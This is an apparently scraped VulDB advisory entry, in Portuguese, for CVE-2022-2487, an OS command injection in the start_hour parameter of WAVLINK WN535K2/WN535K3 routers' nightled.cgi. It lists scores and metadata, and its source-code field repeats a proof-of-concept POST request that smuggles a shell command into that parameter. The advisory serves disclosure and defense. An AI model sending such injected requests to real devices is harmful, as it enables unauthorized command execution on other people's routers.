WAVLINK WN535K2/WN535K3 /cgi-bin/nightled.cgi start_hour direitos alargados

Uma vulnerabilidade foi encontrada em WAVLINK WN535K2 and WN535K3. Foi classificada como crítico. Afectado é uma função desconhecida do ficheiro /cgi-bin/nightled.cgi. A manipulação do argumento start_hour com uma entrada desconhecida leva a direitos alargados. Usar a CWE para declarar o problema leva à CWE-78. O aconselhamento é partilhado para download em github.com. A vulnerabilidade é identificada como CVE-2022-2487. O ataque pode ser levado a cabo na rede local. Os detalhes técnicos estão disponíveis. Além disso, há uma exploração disponível. A exploração foi divulgada ao público e pode ser utilizada. Esta vulnerabilidade é atribuída a T1202 pelo projecto MITRE ATT&CK. É declarado como proof-of-concept. É possível descarregar a exploração em github.com. Como 0 dia, o preço estimado do subsolo foi de cerca de $0-$5k.

Campo20/07/2022 08h4015/08/2022 08h2815/08/2022 08h32
cvss2_vuldb_auSSS
cvss2_vuldb_rlNDNDND
cvss3_vuldb_avAAA
cvss3_vuldb_prLLL
cvss3_vuldb_rlXXX
cvss2_vuldb_basescore7.77.77.7
cvss2_vuldb_tempscore6.66.66.6
cvss3_vuldb_basescore8.08.08.0
cvss3_vuldb_tempscore7.37.37.3
cvss3_meta_basescore8.08.08.6
cvss3_meta_tempscore7.37.38.4
price_0day$0-$5k$0-$5k$0-$5k
vendorWAVLINKWAVLINKWAVLINK
nameWN535K2/WN535K3WN535K2/WN535K3WN535K2/WN535K3
file/cgi-bin/nightled.cgi/cgi-bin/nightled.cgi/cgi-bin/nightled.cgi
argumentstart_hourstart_hourstart_hour
cwe78 (direitos alargados)78 (direitos alargados)78 (direitos alargados)
risk222
cvss3_vuldb_acLLL
cvss3_vuldb_uiNNN
cvss3_vuldb_sUUU
cvss3_vuldb_cHHH
cvss3_vuldb_iHHH
cvss3_vuldb_aHHH
cvss3_vuldb_ePPP
cvss3_vuldb_rcRRR
urlhttps://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20nightled.cgi%20.mdhttps://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20nightled.cgi%20.mdhttps://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20nightled.cgi%20.md
availability111
publicity111
urlhttps://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20nightled.cgi%20.mdhttps://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20nightled.cgi%20.mdhttps://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20nightled.cgi%20.md
cveCVE-2022-2487CVE-2022-2487CVE-2022-2487
responsibleVulDBVulDBVulDB
date1658268000 (20/07/2022)1658268000 (20/07/2022)1658268000 (20/07/2022)
cvss2_vuldb_acLLL
cvss2_vuldb_ciCCC
cvss2_vuldb_iiCCC
cvss2_vuldb_aiCCC
cvss2_vuldb_ePOCPOCPOC
cvss2_vuldb_rcURURUR
cvss2_vuldb_avAAA
sourcecodePOST /cgi-bin/nightled.cgi HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 30 page=night_led&start_hour=;ls;POST /cgi-bin/nightled.cgi HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 30 page=night_led&start_hour=;ls;POST /cgi-bin/nightled.cgi HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 30 page=night_led&start_hour=;ls;
cve_assigned1658268000 (20/07/2022)1658268000 (20/07/2022)
cve_nvd_summaryA vulnerability has been found in WAVLINK WN535K2 and WN535K3 and classified as critical. This vulnerability affects unknown code of the file /cgi-bin/nightled.cgi. The manipulation of the argument start_hour leads to os command injection. The exploit has been disclosed to the public and may be used.A vulnerability has been found in WAVLINK WN535K2 and WN535K3 and classified as critical. This vulnerability affects unknown code of the file /cgi-bin/nightled.cgi. The manipulation of the argument start_hour leads to os command injection. The exploit has been disclosed to the public and may be used.
cvss3_nvd_avN
cvss3_nvd_acL
cvss3_nvd_prN
cvss3_nvd_uiN
cvss3_nvd_sU
cvss3_nvd_cH
cvss3_nvd_iH
cvss3_nvd_aH
cvss3_cna_avA
cvss3_cna_acL
cvss3_cna_prL
cvss3_cna_uiN
cvss3_cna_sU
cvss3_cna_cH
cvss3_cna_iH
cvss3_cna_aH
cve_cnaVulDB
cvss3_nvd_basescore9.8
cvss3_cna_basescore8.0

Do you want to use VulDB in your project?

Use the official API to access entries easily!